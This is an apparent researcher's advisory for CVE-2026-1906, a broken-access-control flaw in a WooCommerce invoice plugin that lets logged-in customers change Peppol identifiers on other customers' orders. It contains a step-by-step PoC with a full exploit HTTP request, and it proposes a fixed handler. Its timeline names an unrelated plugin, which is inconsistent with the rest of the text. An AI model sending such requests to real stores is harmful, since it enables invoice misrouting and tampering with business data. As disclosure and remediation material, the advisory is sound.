CVE-2026-1906 affects PDF Invoices & Packing Slips for WooCommerce. It is a broken access control vulnerability that allows an authenticated low-privilege user to modify business-critical EDI and Peppol identifiers for orders they do not own. The weakness sits in an AJAX handler that updates order meta and user meta based on an attacker-supplied order_id and values payload. In real e-commerce deployments, those identifiers can determine where electronic invoices and structured business documents are delivered. When a customer can change them for other customers, the impact is not only data corruption: it can become misrouting of invoices and potential leakage of business documents to the wrong endpoint, which raises both integrity and confidentiality concerns in addition to operational disruption. With an install base of over 300,000 sites, this is a high-exposure class of issue for stores that enable invoice or e-invoice flows.
| Field | Value |
| --- | --- |
| CVE | CVE-2026-1906 |
| Plugin Version | PDF Invoices & Packing Slips for WooCommerce <= 5.6.0 |
| All Time Downloads | 22 011 744 |
| Active installations | 300 000+ |
| Publicly Published | February 17, 2026 |
| Last Updated | February 17, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference (MITRE) | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1906 |
| Reference (Wordfence) | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-pdf-invoices-packing-slips/pdf-invoices-packing-slips-for-woocommerce-560-missing-authorization-to-authenticated-subscriber-peppol-identifier-modification |
Timeline

| Date | Event |
| --- | --- |
| January 23, 2026 | Plugin testing and vulnerability detection in the Unlimited Elements for Elementor were completed |
| January 23, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| February 17, 2026 | Registered CVE-2026-1906 |
Discovery of the Vulnerability
The vulnerable endpoint is wp-admin/admin-ajax.php?action=wpo_ips_edi_save_order_customer_peppol_identifiers. The handler validates only a nonce-like value intended for document generation, then writes attacker-supplied identifiers into order meta fields such as _peppol_endpoint_id and _peppol_endpoint_eas, and also into user meta for the customer associated with the order. The critical missing control is object-level authorization: the handler does not call current_user_can for a privileged capability, and it does not check that the current user owns the referenced order_id. This turns the endpoint into an IDOR primitive in which order_id is the object reference the attacker can swap at will. Exploitation becomes much more practical in configurations where document link access is set to "Logged in", because the access key used in document links is derived from a predictable nonce creation path, can be obtained by any logged-in customer from their own My Account order view, and can then be reused as the security parameter for the AJAX call.
Understanding IDOR Attacks
IDOR in WooCommerce is a high-risk pattern because order IDs are enumerable and orders are high-value objects. Even if a customer cannot view another customer's order details, the ability to update metadata tied to that order can still cause damage. In WordPress, a nonce is not an authorization decision. It is a request integrity token, and it must be paired with permission checks that bind the action to the correct actor and object. When plugins treat a shared action nonce as the only gate and accept an order_id from the client, they often unintentionally allow any logged-in user to act on any order. In real-world commerce operations, business identifiers like Peppol endpoints are used for routing structured documents, compliance records, and invoicing flows. A malicious customer can sabotage a competitor customer account by setting bogus identifiers, or redirect documents to an attacker-controlled endpoint, or simply corrupt the store's EDI data until administrators intervene. This is why the bug is not a minor settings issue. It is cross-customer business data tampering through an API that should never be callable without strict ownership checks.
Exploiting the IDOR Vulnerability
To exploit CVE-2026-1906, an attacker needs only Subscriber+ cookies.

PoC:

1) Buy something and create an order/invoice.
2) Go to the "My account" page, "Order" section.
3) Find the "access_key" nonce.
4) Send the following request with an order_id that is not yours:

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=wc-orders&action=edit&id=314
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1769323112%7Cj28CzYFDtCqltv9jDEbww4j4IsQFHOO25F2Qtq5D46P%7C6cd3ba05788bd8e84f12df6cb38e6a6bcbd8df13b65d40aa81700039a006e349; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1769323112%7Cj28CzYFDtCqltv9jDEbww4j4IsQFHOO25F2Qtq5D46P%7C034a22b027f4e75eaae8a6bd685d0ea3f1c16b47e9d73ca8b95820a1c35c90f1; spbc_secfw_ip_wl=adb2a133b016d4aeea259f85a613874f
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 173
Origin: http://127.0.0.1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=wpo_ips_edi_save_order_customer_peppol_identifiers&security=157d06d990&order_id=314&values[peppol_endpoint_id]=0191:ATTACKERSSSSSSSSS&values[peppol_endpoint_eas]=0191
```

5) To check the edited fields, try to download the "E-Invoice" of the edited order_id.
The most serious outcome is misrouting of electronic invoices and structured EDI messages. If Peppol endpoint identifiers are used to route documents, an attacker can cause invoices to be delivered to the wrong recipient endpoint, which can expose business document data and create compliance issues. Even when misrouting does not leak full documents, corrupting endpoint identifiers can break invoicing flows, delay fulfilment, and create customer support incidents that are expensive to resolve. Another realistic scenario is broad data corruption through enumeration. Order IDs are typically sequential, so an attacker can iterate order_id values and poison many accounts quickly, especially if the access key is reusable across actions. This becomes an integrity and availability issue for back office operations because staff must identify and restore correct identifiers and potentially reissue documents. It is also a stealth risk. These changes can blend into normal system behavior and may not be noticed until invoices fail or are delivered incorrectly, which means attackers can create delayed impact sabotage that is hard to trace back.
Recommendations for Improved Security
The fix is to enforce strict object-level authorization before any meta is updated. The handler must validate that the current user is allowed to modify the specified order. For customers, that should mean verifying that get_current_user_id() matches the order's customer user ID; for administrators, it should mean requiring a capability like manage_woocommerce. The security parameter should not be a generic nonce that any customer can reuse for unrelated administrative actions. If the endpoint is intended for admins only, it should be registered as a privileged AJAX action and should use a nonce that is only printed in admin contexts. If it is intended for customers, it must require an order-specific token and verify ownership, not only login status. Input validation should also be tightened to ensure Peppol endpoint IDs match expected formats and are not applied globally without explicit permission. Store owners should update to a fixed version as soon as it is available, audit recent changes to Peppol-related meta, and consider temporarily disabling E-Invoice links in My Account if they are not required, because exposing action nonces to low-privilege users increases the blast radius of authorization mistakes.
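The ownership, capability and input checks described in the Discovery and Recommendations sections, as an added illustrative handler (this is example code, not the plugin's own): the hook name, function name, nonce action prefix and identifier regexes are assumptions; the WordPress and WooCommerce API calls are real.

```php
<?php
// Illustrative admin-ajax handler (not the plugin's code) that enforces
// object-level authorization before touching Peppol order meta.
// The form that calls this must be printed with
// wp_create_nonce( 'example_peppol_' . $order_id ) as its "security" value.
add_action( 'wp_ajax_example_save_peppol_identifiers', 'example_save_peppol_identifiers' );

function example_save_peppol_identifiers() {
    // 1. Request integrity: an order-specific nonce, not a shared document nonce.
    $order_id = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
    check_ajax_referer( 'example_peppol_' . $order_id, 'security' );

    $order = wc_get_order( $order_id );
    if ( ! $order ) {
        wp_send_json_error( array( 'message' => 'Order not found.' ), 404 );
    }

    // 2. Authorization: staff with manage_woocommerce, or the order's own customer.
    $current  = get_current_user_id();
    $is_staff = current_user_can( 'manage_woocommerce' );
    $is_owner = $current > 0 && (int) $order->get_customer_id() === $current;
    if ( ! $is_staff && ! $is_owner ) {
        wp_send_json_error( array( 'message' => 'Forbidden.' ), 403 );
    }

    // 3. Input validation. Assumed formats: EAS is a 4-digit scheme code and the
    //    endpoint id is "EAS:identifier" with a conservative identifier charset.
    $values = isset( $_POST['values'] ) && is_array( $_POST['values'] ) ? wp_unslash( $_POST['values'] ) : array();
    $eas    = isset( $values['peppol_endpoint_eas'] ) ? sanitize_text_field( $values['peppol_endpoint_eas'] ) : '';
    $epid   = isset( $values['peppol_endpoint_id'] ) ? sanitize_text_field( $values['peppol_endpoint_id'] ) : '';
    if ( ! preg_match( '/^\d{4}$/', $eas ) || ! preg_match( '/^\d{4}:[A-Za-z0-9._\-]{1,64}$/', $epid ) ) {
        wp_send_json_error( array( 'message' => 'Invalid Peppol identifier.' ), 400 );
    }

    // 4. Write only now, and only to the order that was authorized above.
    $order->update_meta_data( '_peppol_endpoint_eas', $eas );
    $order->update_meta_data( '_peppol_endpoint_id', $epid );
    $order->save();

    // Customer-level (user meta) changes remain a staff-only operation, so a
    // customer cannot change identifiers that apply to all of their orders.
    if ( $is_staff && $order->get_customer_id() ) {
        update_user_meta( $order->get_customer_id(), '_peppol_endpoint_eas', $eas );
        update_user_meta( $order->get_customer_id(), '_peppol_endpoint_id', $epid );
    }

    wp_send_json_success( array( 'order_id' => $order_id ) );
}
```

Because the nonce action includes the order_id, a nonce harvested from one order's My Account view fails check_ajax_referer for any other order, and the ownership check rejects the request even if a valid nonce were obtained some other way.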
By taking proactive measures to address IDOR issues like CVE-2026-1906, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.